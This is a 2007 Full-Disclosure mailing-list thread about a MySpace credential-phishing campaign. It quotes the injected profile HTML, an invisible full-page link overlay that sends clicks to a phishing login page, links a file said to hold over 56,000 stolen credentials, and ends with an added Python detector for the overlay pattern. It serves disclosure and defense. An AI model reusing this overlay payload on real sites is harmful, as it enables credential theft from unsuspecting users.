Re: [Full-disclosure] Grab a myspace credential
- To: codeshepherd@xxxxxxxxx
- Subject: Re: [Full-disclosure] Grab a myspace credential
- From: wac <waldoalvarez00@xxxxxxxxx>
- Date: Tue, 16 Jan 2007 09:55:51 -0500
On 1/16/07, Deepan <codeshepherd@xxxxxxxxx> wrote:
On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
> "but at some point all this abuse will likely start sending users off
> to another service. "
>
> that's only --if they know if they are being abused.. most of them are
> not coherent about any such issues..
>
>
>
> On 1/15/07, Kevin Pawloski <kpawloski@xxxxxxxxx> wrote:
> The level of phishing sites targeting MySpace and bot related
It is not quite easy to fool 56000+ users using phishing sites. I wonder
how Mark is doing it.
Hmm... Oh no, it is very easy, yes, very easy what he is doing. He left some
traces on some of the "cracked" accounts. I was expecting somebody to
comment earlier since it's been a couple of hours since the initial post.
When you modify a profile you can add this to the data of the profile, you
know, those HTML customizations. I found this on one of the accounts, and it
really got my attention a little bit more than the girl of the account :P
HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/"><img
style="border-width:0px;width:2024px; height:1768px;"
src="http://x.myspace.com/images/clear.gif"></a><a
style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/"><img
style="border-width:0px;width:2024px; height:1768px;"
src="http://x.myspace.com/images/clear.gif"></a><embed
allowScriptAccess="never" allowNetworking="internal" enableJSURL="false"
enableHREF="false" saveEmbedTags="true"
src="http://www.../mov/cid_3277_f.mov" width="1" height="1">
As you might see, this creates a huge invisible link in the page in front of
everything, so when you click into anything on the page like a link or
anything it will take you to that phishing website so people believe that the
account expired and enter their user+pass. Now I believe that his message
was a way to tell about a BUG in myspace that should filter that content and
it is not doing it. So... we are in fact not talking about a stupid phishing
website for those who still believe that.
Regards
Waldo
> activity that has been targeting MySpace lately is pretty
> alarming. Granted there is no real financial risk if an
> account gets compromised for the user but at some point all
> this abuse will likely start sending users off to another
> service.
>
> Kevin
>
>
> On 1/15/07, North, Quinn <QNorth@xxxxxxx> wrote:
> "youmustbecompleteretards@xxxxxxxxx
:doyouhonestlythinkiwillputmyrealpass
> wordhere"
>
> ...at least there is some hope left in the world :-\
>
> --=Q=--
>
> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On
> Behalf Of Emma
> Perdue
> Sent: Monday, January 15, 2007 7:48 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Grab a myspace credential
>
> 56000+ and counting
>
> http://www.marcolano.com/login/myspace.txt
>
> --
> *Emma aka TINK*
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
-----------------------------------------------
Regards
Deepan Chakravarthy N
http://www.codeshepherd.com/
http://sudoku-solver.net/
I am a programmer by day,
I dig grave for other programmers by night.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
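
An added example, not part of the original message or of any MySpace code: a server-side check that flags the pattern Waldo describes in user-supplied profile HTML, a link taken out of normal flow with `position: absolute` (or `fixed`) that wraps an oversized image. The function names, the `MAX_PX` threshold and the `example.invalid` hosts are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

MAX_PX = 1000  # assumed threshold: larger than any legitimate profile image

def parse_style(style):
    """Inline style string -> {property: value}, lower-cased."""
    pairs = (d.partition(":") for d in (style or "").split(";"))
    return {k.strip().lower(): v.strip().lower() for k, sep, v in pairs if sep}

def px(value):
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 0

class OverlayLinkFinder(HTMLParser):
    """Collects hrefs of out-of-flow links that wrap an oversized image."""
    def __init__(self):
        super().__init__()
        self.current = None   # href of the positioned <a> we are inside, if any
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        style = parse_style(attrs.get("style"))
        if tag == "a":
            positioned = style.get("position") in ("absolute", "fixed")
            self.current = (attrs.get("href") or "").strip() if positioned else None
        elif tag == "img" and self.current is not None:
            w = max(px(style.get("width")), px(attrs.get("width")))
            h = max(px(style.get("height")), px(attrs.get("height")))
            if w >= MAX_PX or h >= MAX_PX:
                self.findings.append(self.current)

    def handle_endtag(self, tag):
        if tag == "a":
            self.current = None

def find_overlay_links(html):
    finder = OverlayLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample, modelled on the shape of the markup quoted in the message.
SAMPLE = (
    'HOLA!<a style="position: absolute;top:1px;left:1px;" href=" http://phish.example.invalid/login/">'
    '<img style="width:2024px; height:1768px;" src="http://img.example.invalid/clear.gif"></a>'
    '<a href="http://friend.example.invalid/"><img width="120" src="me.jpg"></a>'
)
```

This only inspects inline `style` and `width`/`height` attributes, so it is a detection heuristic for reviewing stored profiles. The filtering Waldo says is missing would be an allowlist sanitizer that drops positioning properties from user-supplied styles altogether.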